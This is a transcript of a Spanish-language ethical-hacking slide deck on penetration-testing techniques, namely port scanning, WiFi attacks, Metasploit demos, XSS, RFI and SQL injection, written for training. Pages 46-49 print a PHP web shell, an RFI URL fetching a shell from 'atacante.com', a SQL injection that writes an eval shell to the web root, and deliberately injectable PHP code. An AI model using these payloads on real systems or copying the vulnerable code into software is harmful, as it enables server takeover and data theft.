Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales...

55
Técnicas avanzadas de penetración a sistemas Ponente: Rafael Gómez Del Ángel Aka : NoSfEr@tU

Transcript of Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales...

Page 1: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

Técnicas avanzadas de penetración a sistemas

Ponente: Rafael Gómez Del Ángel

Aka : NoSfEr@tU

Page 2: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

HACKING ETICOLos hackers éticos son profesionales de la seguridad queaplican sus conocimientos de hacking con finesdefensivos (y legales). Diremos hacker siempre, pero hay que fijarse en el contexto.

Page 3: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

QUE ES UN HACKER

Experto en algún campo de la informática Conocimientos profundos de diversas

Plataformas (Windows, Unix, Linux, android). Conocimientos de redes Conocimientos de hardware y software.

Page 4: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

Pasos previos al ATAQUE

1. Reconocimiento• Pasivo• Activo2. Rastreo (escaner)3. Acceso• Niveles del Sistema• Redes• DOS4. Mantener el

acceso5. Borrado de

huellas

Page 5: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

FOOTPRINTING

Obtención de los perfiles de seguridad de una organización haciendo uso de una metodología (footprinting).

El resultado del footprinting es un perfil único de la organización en cuanto a sus redes (Internet / Intranet / Extranet /Wireless) y sistemas.

Page 6: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

FOOTPRINTING

1.- Obtener información inicial• whois• nslookup2.- Localizar el rango de red• Traceroute

Page 7: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

TIPOS DE ATAQUES

1.- Hacking WIFI2.-DOS3.-DDOS4.-M.I.T5.- Envenenamiento DNS6.-Reverse Shell7.-Port scaning

8.-Inyecciones SQL9.-R.F.I10.-XSS11.-Inyeccion de comandos arbitrarios12.-Hijacking13.-Cookie poisoning

Page 8: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

Hacking Wifi

Page 9: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

Definiciones

·BSSID ·IVS·SSID ·Mode monitor·AP ·WEP·STATION ·WPA·DOS

Page 10: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

·Hacking WEP ·Fake AP·Wifi DOS (A usuarios y sobre saturación de frecuencias)

Que Ataques analizaremos?

Page 11: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

Fake Ap método De

Ataque y contra Ataque

Page 12: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

DOS (Denial of service)En redes Wifi

*Sobre saturacion de Frecuencias

*Des-autentificacion infinita de usuarios

Page 13: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

Detección y AnálisisWardriving

Page 14: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

Escaneo de Puertos

El escaneo de puertos es el ataque primario y mas común utilizado en una auditoria ya sea legal o ilegal.Nos permite :ExplorarIdentificarComprender

Page 15: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

Técnicas

TCP connect ()

Reverse Ident

TCP SYN

Zombie scan

TCP FIN

ACK Scan

Null Scan

Xmas Scan

SYN/ACK Scan

Fragmentación TCP

TCP echo

UDP echo

TCP ACK

TCP SYN

ICMP echo

UDP scan

FTP bounce

scan

AbiertoMedio abierto Silencioso Barridos Otros

Tipo de escaneo

Page 16: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

TCP connect()La mas común de cualquier software de escaneo de puertosconsiste en usar la llamada connect() de TCP

Intenta establecer conexiónSi conecta el puerto esta abiertosi no , el puerto esta cerradoSi no contesta esta silencioso

Muy rápido e invasivo y llamativo en exceso. * Miles de conexiones*Logs

Page 17: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

ComportamientoTCP connect()

Hacker-------[SYN]------>[0] Puerto TCP Victima OPENHacker<-------[SYN/ACK]-------[0] Puerto TCP Victima OPENHacker-------[ACK]------->[0] Puerto TCP Victima OPEN

Hacker-------[SYN]------->[X] Puerto TCP Victima CLOSEDHacker<-----[RST]-------[X] Puerto TCP Victima CLOSED

Hacker------[SYN]-------[*] Puerto TCP Victima SILENT

Page 18: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

TCP SYNTécnica conocida como Half-open scan, escaneo medio abierto por excelenciase envía un paquete SYN fingiendo establecer una conexion y se espera la respuesta del Host, si llega un paquete SYN/ACK significa que esta abierto y no devolvemos la contestación ACK, devolvemos RST , esto para evitar que se complete el inicio de conexión y así burlar el registro del sistema como intento de conexión

*Discreto*Excelentes resultados

Page 19: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

ComportamientoTCP SYN

Hacker ---[SYN]---> [O] P. TCP abierto en la VictimaHacker <---[SYN/ACK]--- [O] P. TCP abierto en la VictimaHacker ---[RST]---> [O] P. TCP abierto en la Victima

Hacker ---[SYN]---> [X] Puerto TCP cerrado en la VictimaHacker <---[RST]--- [X] Puerto TCP cerrado en la Victima

Hacker ---[SYN]---> [~] Puerto TCP silencioso en la Victima

Page 20: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

ACK scanDestinado a identificar aquellos puertos que están en estado silencioso de forma precisa cuando un puerto esta en este estado o no.Envía paquetes ACK con números de secuencia y confirmación aleatorios.si el puerto esta abierto, responderá con un paquete RST, pues no identificara la conexión como suyasi el puerto esta cerrado responderá RST pero si no responde es que esta filtrado.* Apoyo de un escaneo anterior*Variable del ping si responde RST esta vivo si no es in alcanzable.*Identificar firewall bloqueando SYN.

Page 21: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

ComportamientoACK scan

Hacker ---[ACK]---> [O] Puerto TCP abierto en la VictimaHacker <---[RST]--- [O] Puerto TCP abierto en la Victima

Hacker ---[ACK]---> [X] Puerto TCP cerrado en la VictimaHacker <---[RST]--- [X] Puerto TCP cerrado en la Victima

Hacker ---[ACK]---> [~] Puerto TCP silencioso en la Victima

Page 22: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

Null scan

Similar al FIN, funciona del mismo modo, enviando paquetes malformados, pero en este caso con los flags desactivados, si el puerto esta cerrado nos responderá con RST y En caso de no recibir nada el puerto esta abierto o silencioso.

Ciertos firewalls vigilan los paquetes de finalización aquí hace lo que FIN no.

Page 23: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

ComportamientoNull scan

Hacker ---[ ]---> [O] Puerto TCP abierto en la Victima

local ---[ ]---> [X] Puerto TCP cerrado en la VictimaHacker <---[RST]--- [X] Puerto TCP cerrado en la Victima

Hacker ---[ ]---> [~] Puerto TCP silencioso en la Victima

Page 24: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

La razón

Page 25: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

POC Analizar 2 tipos de escaneo con la intención de evadir un firewall y obtener información acerca de los puertos abiertos.

Page 26: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

Ataques MIT1. DNS cache poisoning2. ARP Poisoning3. Phishing

Page 27: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

EXPLOTACION

Page 28: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

Escáner de vulnerabilidades

Page 29: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

Escáner de vulnerabilidades

Page 30: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.
Page 31: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

EXPLOTACION

Page 32: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

MetasploitWindows Server 2003

Page 33: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

PenetraciónWindows Server 2003prueba de concepto

Puerto 4451. ms080672. Crear usuario3. Habilitar Escritorio Remoto4. Cambiar la contraseña del Administrador

OBJETIVOMostrar el ataque de penetración a Windows server 2003 en un ambiente controlado.

Page 34: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

MetasploitWindows Server 2008 R2

Page 35: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

MetasploitWindows Server 2008 R2

•Numero de vulnerabilidad : ms09050•Encontrar el servidor verificando versión de smb•Explotar la vulnerabilidad •Denegación de servicios.

OBJETIVOMostrar el ataque de Denegación de servicios a Windows server 2008 en un ambiente controlado.

Page 36: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

MetasploitWindows XP SP3

Page 37: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

MetasploitPenetración a Windows XP SP3

Prueba de concepto

1. Encontrar la victima verificando versión de SMB2. Lograr la obtención de una reverse shell 3. Habilitar el uso de escritorio remoto4. Inyectar la conexión a escritorio remoto

OBJETIVOMostrar el ataque de penetración a windows XP sp3 en un ambiente controlado.

Page 38: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

MetasploitWindows 7

Page 39: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

MetasploitWindows 7 Penetración

Prueba de concepto

1. Usar INGENIERIA SOCIAL

2. Copiar netcat a la victima y crear puerta trasera creando REVERSE SHELL

3. Vulnerar navegador web.

4. UPLOAD MI PATH C:\DESTINO\\Downloads

OBJETIVOMostrar el ataque de penetración a windows 7 en un ambiente controlado.

Page 40: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

Ataques WEB

Page 41: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

Ataques XSSAnalicemos la vulnerabilidad de xss

Es una vulnerabilidad de grado medio alto ya que con estos ataques será posible el re alizar el hijacking que es el robo de identidad mediante las cookies del navegador

Page 42: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

Ataques XSS

Page 43: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

Ataques XSS

Page 44: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

Ataques XSS

Page 45: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

Ataques RFIRemote file

inclusionvulnerabilidad que afecta únicamente a paginas dinámicas programadas en PHP, consiste en enlazar archivos ubicados en un servidor remoto.

RFI se aprovecha del uso irresponsable de lasfunciones include y requiere, las cuales, debido al limitado conocimiento del programador ylas pocas o nulas validaciones que realiza antes de incluir una variable recibida porparametro de URL, pueden ser aprovechadas por usuarios maliciosos para incluir scriptsprogramados para explotar dicha vulnerabilidad.

Page 46: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

Ataques RFIRemote file

inclusionhttp://www.victima.com/index.php?nav=pagina1phphttp://www.victimacom/index.php?nav=pagina2.php

<?phpprint system($_GET['command']);?>

http://www.victima.com/index.php?nav=http://atacante.com/shell.txt&command=ls

Page 47: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.
Page 48: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

Inyeccion SQL

union all select "<?php eval($_GET['exec']); ?>",2,3,4into outfile"/var/www/html/exec.php"

Page 49: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

Analicemos este código

<?php$link = mysql_connect('127.0.0.1','root', 'pass');mysql_select_db('ejemplo', $link);$sql = mysql_query('select * from ejemplo where id='.$_GET['id'], $link);if(mysql_errno($link)){ echo mysql_error($link);exit;}while($row = mysql_fetch_assoc($sql)){ echo $row['id']."".$row['titulo']."".$row['contenido']."".$row['parent'];}?>

Page 50: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

Busqueda de tablas.

Page 51: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

Prueba de concepto

OBJETIVOMostrar el ataque de inyección SQL y la técnica de intrusión de SHELL en un ambiente controlado.

Page 52: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

EL RESULTADOllegando a una

conclusión

Page 53: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

El resultado.

Page 54: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.
Page 55: Técnicas avanzadas de penetración a sistemas. HACKING ETICO Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking.

GRACIAS

Ponente: Rafael Gómez Del Ángel Aka : NoSfEr@tU